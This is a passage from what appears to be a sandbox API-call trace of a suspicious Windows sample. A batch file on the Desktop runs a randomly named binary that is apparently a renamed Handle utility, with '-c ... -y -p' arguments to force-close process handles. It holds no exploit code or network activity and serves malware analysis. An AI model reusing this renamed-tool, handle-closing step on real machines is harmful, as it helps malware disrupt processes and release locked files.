(_FileHandle=1) returned 0x7 [0163.538] GetFileType (hFile=0x7) returned 0x2 [0163.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.539] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x7) returned 1 [0163.541] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x3aef98 | out: _Buffer="(`tdq963ii.exe -accepteula \"blank.jtp\" -nobanner`) DO ") returned 54 [0163.541] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.541] GetFileType (hFile=0x7) returned 0x2 [0163.542] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.542] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef58 | out: lpMode=0x3aef58) returned 1 [0163.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.542] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x3aef84, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef84*=0x36) returned 1 [0163.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.543] GetFileType (hFile=0x7) returned 0x2 [0163.543] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.543] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef64 | out: lpMode=0x3aef64) returned 1 [0163.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.544] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3aef90, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x3aef90*=0x1) returned 1 [0163.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.544] GetFileType (hFile=0x7) returned 0x2 [0163.545] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.545] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef48 | out: lpMode=0x3aef48) returned 1 [0163.545] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.545] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x441250*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3aef74, lpReserved=0x0 | out: lpBuffer=0x441250*, lpNumberOfCharsWritten=0x3aef74*=0xc) returned 1 [0163.545] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aef80 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0163.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.546] GetFileType (hFile=0x7) returned 0x2 [0163.546] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.546] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef40 | out: lpMode=0x3aef40) returned 1 [0163.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.546] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aef6c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef6c*=0x26) returned 1 [0163.549] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aef9c | out: _Buffer=") ") returned 2 [0163.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.549] GetFileType (hFile=0x7) returned 0x2 [0163.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0163.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.550] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x2) returned 1 [0163.551] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aefbc | out: _Buffer="\r\n") returned 2 [0163.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.551] GetFileType (hFile=0x7) returned 0x2 [0163.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0163.551] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef7c | out: lpMode=0x3aef7c) returned 1 [0163.552] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.552] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aefa8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aefa8*=0x2) returned 1 [0163.554] GetProcessHeap () returned 0x440000 [0163.554] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x456288 [0163.554] GetProcessHeap () returned 0x440000 [0163.554] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xc) returned 0x440d38 [0163.554] GetProcessHeap () returned 0x440000 [0163.555] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xc) returned 0x440d50 [0163.555] GetProcessHeap () returned 0x440000 [0163.555] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe) returned 0x440d68 [0163.555] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0163.555] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0163.555] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0163.555] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0163.555] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0163.555] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0163.555] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0163.555] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x3aeed8, _Radix=0 | out: _EndPtr=0x3aeed8*=",6 delims=: \"") returned 3 [0163.555] wcstol (in: _String="6 delims=: \"", _EndPtr=0x3aeed8, _Radix=0 | out: _EndPtr=0x3aeed8*=" delims=: \"") returned 6 [0163.555] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0163.555] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0163.556] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0163.556] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0163.556] GetProcessHeap () returned 0x440000 [0163.556] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d68 | out: hHeap=0x440000) returned 1 [0163.556] GetProcessHeap () returned 0x440000 [0163.556] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe) returned 0x440d68 [0163.556] GetProcessHeap () returned 0x440000 [0163.556] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440d38, Size=0xe) returned 0x440d80 [0163.556] GetProcessHeap () returned 0x440000 [0163.556] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440d80) returned 0xe [0163.556] GetProcessHeap () returned 0x440000 [0163.556] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440d50, Size=0x14) returned 0x4562c0 [0163.556] GetProcessHeap () returned 0x440000 [0163.556] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4562c0) returned 0x14 [0163.556] _wpopen (_Command="tdq963ii.exe -accepteula \"blank.jtp\" -nobanner", _Mode="rb") returned 0x77032960 [0163.580] feof (_File=0x77032960) returned 0 [0163.580] ferror (_File=0x77032960) returned 0 [0163.580] GetProcessHeap () returned 0x440000 [0163.580] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x108) returned 0x4562e0 [0163.581] fgets (in: _Buf=0x4562e8, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0178.219] feof (_File=0x77032960) returned 0 [0178.219] ferror (_File=0x77032960) returned 0 [0178.219] GetProcessHeap () returned 0x440000 [0178.219] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4562e0, Size=0x208) returned 0x4562e0 [0178.220] GetProcessHeap () returned 0x440000 [0178.220] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4562e0) returned 0x208 [0178.220] fgets (in: _Buf=0x45632e, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0178.220] feof (_File=0x77032960) returned 0 [0178.220] ferror (_File=0x77032960) returned 0 [0178.220] GetProcessHeap () returned 0x440000 [0178.220] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4562e0, Size=0x308) returned 0x4562e0 [0178.220] GetProcessHeap () returned 0x440000 [0178.220] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4562e0) returned 0x308 [0178.220] fgets (in: _Buf=0x456331, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0181.190] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0181.192] GetProcessHeap () returned 0x440000 [0181.192] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4562e0, Size=0x9e) returned 0x4562e0 [0181.192] GetProcessHeap () returned 0x440000 [0181.192] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4562e0) returned 0x9e [0181.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x456331, cbMultiByte=73, lpWideCharStr=0x4562e8, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0181.193] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aebcc | out: _Buffer="\r\n") returned 2 [0181.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.193] GetFileType (hFile=0x7) returned 0x2 [0181.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.197] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aeb8c | out: lpMode=0x3aeb8c) returned 1 [0181.197] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.197] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aebb8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aebb8*=0x2) returned 1 [0181.199] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0181.200] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3aebc8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0181.200] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3aebc8 | out: _Buffer=">") returned 1 [0181.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.200] GetFileType (hFile=0x7) returned 0x2 [0181.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.200] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aeb90 | out: lpMode=0x3aeb90) returned 1 [0181.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.201] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aebbc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3aebbc*=0x26) returned 1 [0181.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.201] GetFileType (hFile=0x7) returned 0x2 [0181.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.202] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aee14 | out: lpMode=0x3aee14) returned 1 [0181.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.202] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3aee40, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x3aee40*=0x1) returned 1 [0181.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.203] GetFileType (hFile=0x7) returned 0x2 [0181.203] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.203] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aedf8 | out: lpMode=0x3aedf8) returned 1 [0181.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.204] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x464ab0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3aee24, lpReserved=0x0 | out: lpBuffer=0x464ab0*, lpNumberOfCharsWritten=0x3aee24*=0xc) returned 1 [0181.204] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aee30 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0181.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.204] GetFileType (hFile=0x7) returned 0x2 [0181.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.205] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aedf0 | out: lpMode=0x3aedf0) returned 1 [0181.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.205] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x3aee1c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aee1c*=0x2c) returned 1 [0181.207] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aee4c | out: _Buffer=") ") returned 2 [0181.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.207] GetFileType (hFile=0x7) returned 0x2 [0181.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.212] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aee0c | out: lpMode=0x3aee0c) returned 1 [0181.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.213] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aee38, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aee38*=0x2) returned 1 [0181.213] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aee6c | out: _Buffer="\r\n") returned 2 [0181.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.213] GetFileType (hFile=0x7) returned 0x2 [0181.214] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0181.214] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aee2c | out: lpMode=0x3aee2c) returned 1 [0181.214] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.214] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aee58, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aee58*=0x2) returned 1 [0181.216] GetConsoleTitleW (in: lpConsoleTitle=0x3ae97c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.217] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x456630, lpFilePart=0x3ae49c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ae49c*="Desktop") returned 0x25 [0181.217] SetErrorMode (uMode=0x0) returned 0x1 [0181.217] GetProcessHeap () returned 0x440000 [0181.217] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x456628, Size=0x6e) returned 0x456628 [0181.217] GetProcessHeap () returned 0x440000 [0181.217] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x456628) returned 0x6e [0181.217] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.217] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.217] GetProcessHeap () returned 0x440000 [0181.217] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x120) returned 0x4566a0 [0181.217] GetProcessHeap () returned 0x440000 [0181.217] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x238) returned 0x4567c8 [0181.217] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.218] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x3ae238, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ae238) returned 0x456978 [0181.218] FindClose (in: hFindFile=0x456978 | out: hFindFile=0x456978) returned 1 [0181.218] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0181.218] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0181.218] GetConsoleTitleW (in: lpConsoleTitle=0x3ae710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.219] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ae598, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ae660 | out: lpAttributeList=0x3ae598, lpSize=0x3ae660) returned 1 [0181.219] UpdateProcThreadAttribute (in: lpAttributeList=0x3ae598, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ae658, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ae598, lpPreviousValue=0x0) returned 1 [0181.219] GetStartupInfoW (in: lpStartupInfo=0x3ae554 | out: lpStartupInfo=0x3ae554*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0181.219] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.219] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3ae5f4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ae640 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x3ae640*(hProcess=0x74, hThread=0x84, dwProcessId=0xb38, dwThreadId=0xa70)) returned 1 [0181.232] CloseHandle (hObject=0x84) returned 1 [0181.232] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.232] GetProcessHeap () returned 0x440000 [0181.232] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457f30 | out: hHeap=0x440000) returned 1 [0181.232] GetEnvironmentStringsW () returned 0x456b80* [0181.232] GetProcessHeap () returned 0x440000 [0181.232] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb7a) returned 0x457f30 [0181.232] FreeEnvironmentStringsW (penv=0x456b80) returned 1 [0181.232] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0189.510] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3ae534 | out: lpExitCode=0x3ae534*=0x1) returned 1 [0189.510] CloseHandle (hObject=0x74) returned 1 [0189.511] _vsnwprintf (in: _Buffer=0x3ae67c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ae540 | out: _Buffer="00000001") returned 8 [0189.511] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0189.511] GetProcessHeap () returned 0x440000 [0189.511] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457f30 | out: hHeap=0x440000) returned 1 [0189.511] GetEnvironmentStringsW () returned 0x456b80* [0189.511] GetProcessHeap () returned 0x440000 [0189.511] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb7a) returned 0x457f30 [0189.511] FreeEnvironmentStringsW (penv=0x456b80) returned 1 [0189.511] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.511] GetProcessHeap () returned 0x440000 [0189.511] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457f30 | out: hHeap=0x440000) returned 1 [0189.511] GetEnvironmentStringsW () returned 0x456b80* [0189.511] GetProcessHeap () returned 0x440000 [0189.511] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb7a) returned 0x457f30 [0189.511] FreeEnvironmentStringsW (penv=0x456b80) returned 1 [0189.511] GetProcessHeap () returned 0x440000 [0189.511] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d50 | out: hHeap=0x440000) returned 1 [0189.512] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ae598 | out: lpAttributeList=0x3ae598) [0189.512] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.512] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0189.513] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.513] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0189.514] SetConsoleInputExeNameW () returned 0x1 [0189.514] GetConsoleOutputCP () returned 0x1b5 [0189.514] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0189.514] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3aef64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0189.515] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0189.515] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.515] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4568f8 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4567c8 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4566a0 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456628 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4565a0 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456388 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464af0 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0189.516] GetProcessHeap () returned 0x440000 [0189.516] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d68 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4562c0 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d80 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456288 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456228 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441248 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4561c8 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456168 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4560f0 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411f0 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4412a0 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4411a0 | out: hHeap=0x440000) returned 1 [0189.517] GetProcessHeap () returned 0x440000 [0189.517] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x441140 | out: hHeap=0x440000) returned 1 [0189.518] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.518] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0189.518] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef48, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef48*=0x0, lpOverlapped=0x0) returned 1 [0189.518] GetLastError () returned 0x0 [0189.518] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.518] GetFileType (hFile=0x74) returned 0x1 [0189.518] _get_osfhandle (_FileHandle=3) returned 0x74 [0189.518] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0189.518] GetProcessHeap () returned 0x440000 [0189.518] 